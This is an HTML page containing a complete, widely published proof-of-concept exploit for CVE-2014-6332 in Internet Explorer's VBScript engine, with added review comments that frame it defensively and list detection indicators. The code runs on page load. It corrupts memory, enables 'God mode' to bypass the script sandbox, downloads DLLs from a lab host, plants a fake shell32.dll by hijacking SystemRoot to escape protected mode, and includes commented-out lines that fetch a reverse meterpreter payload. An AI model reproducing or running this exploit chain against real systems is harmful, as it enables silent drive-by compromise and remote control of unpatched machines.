<!-- Review note (defensive context): the listing below is a widely published PoC for CVE-2014-6332, an Internet Explorer VBScript memory-safety bug that Microsoft fixed in November 2014 (MS14-064); it is kept here for reference and study of the technique. Host-side indicators that are visible in this code: files fetched from the lab address http://192.168.1.100/ into the IE cache (getdll), a downloaded file copied to a System32\shell32.dll path under the user's temp folder (loaddll), the process-level SystemRoot variable pointed at that temp folder immediately before CreateObject("Shell.Application"), and a redirect to http://localhost:5555/stage2.html (tolocal). Primary mitigation is the vendor patch; VBScript execution in IE11 has since also been disabled by default. -->
<!-- CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode - Tested on IE11 + Windows 7 64-bit References: - original PoC - http://www.exploit-db.com/exploits/35229/ - http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ - http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html - https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-Pwn-Anywhere.pdf - http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-s-No-Place-Like-Localhost-A-Welcoming-Front-Door-To-Medium/ba-p/6560786#.U9v5smN5FHb --> <script>// <![CDATA[ var oReq; function getdll(downloadFile) { oReq = new XMLHttpRequest(); oReq.open("GET", "http://192.168.1.100/"+downloadFile, true); oReq.onreadystatechange = handler; oReq.send(); } function handler() { if (oReq.readyState == 4 && oReq.status == 200) { OnDownloadDone(); } } function tolocal() { location.href = "http://localhost:5555/stage2.html" } // ]]></script> <script>// <![CDATA[ ' local server files to get medium integrity downloadFiles = Array("ieshell32.dll", "ielocalserver.dll", "stage2.html") cacheRegex = Array("^ieshell32[d].dll$", "^ielocalserver[d].dll$", "^stage2[d].htm$") ' reverse meterpreter shell files 'downloadFiles = Array("ieshell32.dll", "metp.dll") 'cacheRegex = Array("^ieshell32[d].dll$", "^metp[d].dll$") Dim cacheFiles(3) Dim downloadState Dim pinTime Dim oFSO Dim oWS Dim shell function FindFile(path, regexFile) FindFile = "" For Each f in oFSO.GetFolder(path).Files If regexFile.Test(f.Name) Then FindFile = f.Name Exit For End If Next end function function SearchCache(path, regexFile) SearchCache = "" For Each fld in oFSO.GetFolder(path).SubFolders 'If DateDiff("s", pinTime, fld.DateLastModified) >= 0 Then filename = FindFile(path & "" & fld.Name, regexFile) If filename <> "" Then SearchCache = path & "" & fld.Name & "" & filename Exit For End If 'End If 
' NOTE(review): SearchCache/OnDownloadDone walk the Temporary Internet Files\Low\Content.IE5 cache by regex, and loaddll creates then deletes a System32 folder with a shell32.dll copy under the temp directory. The short-lived folder, a shell32.dll outside the real system directory, and a SystemRoot environment value that does not match the machine's install path are the signals a detection rule should key on.
Next end function function loaddll() On Error Resume Next Set wshSystemEnv = oWS.Environment("Process") tmpDir = oFSO.GetSpecialFolder(2) tmpSysDir = tmpDir & "System32" tmpShellFile = tmpSysDir & "shell32.dll" oFSO.CreateFolder(tmpSysDir) oFSO.CopyFile cacheFiles(0), tmpShellFile mydllFile = tmpDir & "" & downloadFiles(1) oFSO.CopyFile cacheFiles(1), mydllFile wshSystemEnv("MyDllPath") = mydllFile If (UBound(downloadFiles) = 2) Then stage2File = tmpDir & "stage2.html" oFSO.CopyFile cacheFiles(2), stage2File wshSystemEnv("stage2file") = stage2File End If saveRoot = wshSystemEnv("SystemRoot") wshSystemEnv("SaveSystemRoot") = saveRoot wshSystemEnv("SystemRoot") = tmpDir Set shell = CreateObject("Shell.Application") ' have to restore %SystemRoot% in dll, not here oFSO.DeleteFile tmpShellFile oFSO.DeleteFolder tmpSysDir If (UBound(downloadFiles) = 2) Then call tolocal() End If end function Sub OnDownloadDone() cacheDir = oWS.ExpandEnvironmentStrings("%LOCALAPPDATA%") cacheDir = cacheDir & "MicrosoftWindowsTemporary Internet FilesLowContent.IE5" Set regexFile = new regexp regexFile.Pattern = cacheRegex(downloadState) cacheFiles(downloadState) = SearchCache(cacheDir, regexFile) If cacheFiles(downloadState) = "" Then Exit Sub End If If downloadState = UBound(downloadFiles) Then loaddll() Else downloadState = downloadState + 1 DoDownload() End If End Sub Sub DoDownload() pinTime = Now call getdll(downloadFiles(downloadState)) End Sub Sub runshell() Set oFSO = CreateObject("Scripting.FileSystemObject") Set oWS = CreateObject("WScript.Shell") downloadState = 0 DoDownload() End Sub // ]]></script> <script>// <![CDATA[ dim arrX() dim arrY() dim asize dim incsize dim olapPos Begin() function Begin() On Error Resume Next Init() If Exploit() = True Then EnableGodMode() redim Preserve arrX(asize) runshell() End If end function function Init() Randomize() asize = 13 + 17*rnd(6) incsize = 7 + 3*rnd(5) end function function Exploit() dim i Exploit = False For i = 0 To 400 asize = 
asize + incsize If Trigger() = True Then Exploit = True Exit For End If Next end function function Trigger() On Error Resume Next dim typev dim ofnumele Trigger = False olapPos = asize + 2 ofnumele = asize + &h8000000 redim Preserve arrX(asize) redim arrY(asize) redim Preserve arrX(ofnumele) typev = 1 arrY(0) = 1.123456789012345678901234567890 If (IsObject(arrX(olapPos-1)) = False) Then If (VarType(arrX(olapPos-1)) <> 0) Then If (IsObject(arrX(olapPos)) = False) Then typev = VarType(arrX(olapPos)) End If End If End If If (typev = &h2f66) Then Trigger = True Else redim Preserve arrX(asize) End If end function function ReadMemInt(addr) arrY(0) = 0 arrX(olapPos) = addr+4 arrY(0) = 8 ReadMemInt = lenb(arrX(olapPos)) end function function EnableGodMode() i = LeakFnAddr() i = ReadMemInt(i+8) i = ReadMemInt(i+16) myarray = Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uFFFF%u7FFF%u0000%u0000") arrX(olapPos+2) = myarray arrY(2) = 8192 + 12 EnableGodMode = False For k=0 To &h60 step 4 j = ReadMemInt(i+&h120+k) If (j = 14) Then arrX(olapPos+2)(i+&h11c+k) = arrY(4) EnableGodMode = True Exit For End If Next end function sub dummyfn() end sub function LeakFnAddr() On Error Resume Next i = dummyfn i = null arrY(0) = 0 arrX(olapPos) = i arrY(0) = 3 LeakFnAddr = arrX(olapPos) end function // ]]></script>
<!-- Review note: the third script block (Begin, Init, Exploit, Trigger, ReadMemInt, EnableGodMode, LeakFnAddr) is the memory-corruption trigger and the VBScript safe-mode bypass; its mechanics are analysed in the Trend Micro, Coverity and Black Hat references listed at the top of this page. Note that Begin() is invoked at script load, so merely rendering a page of this kind in a vulnerable IE is sufficient to run the chain - no user interaction is required, which is why patch level and script-engine restrictions, not user awareness, are the relevant controls. -->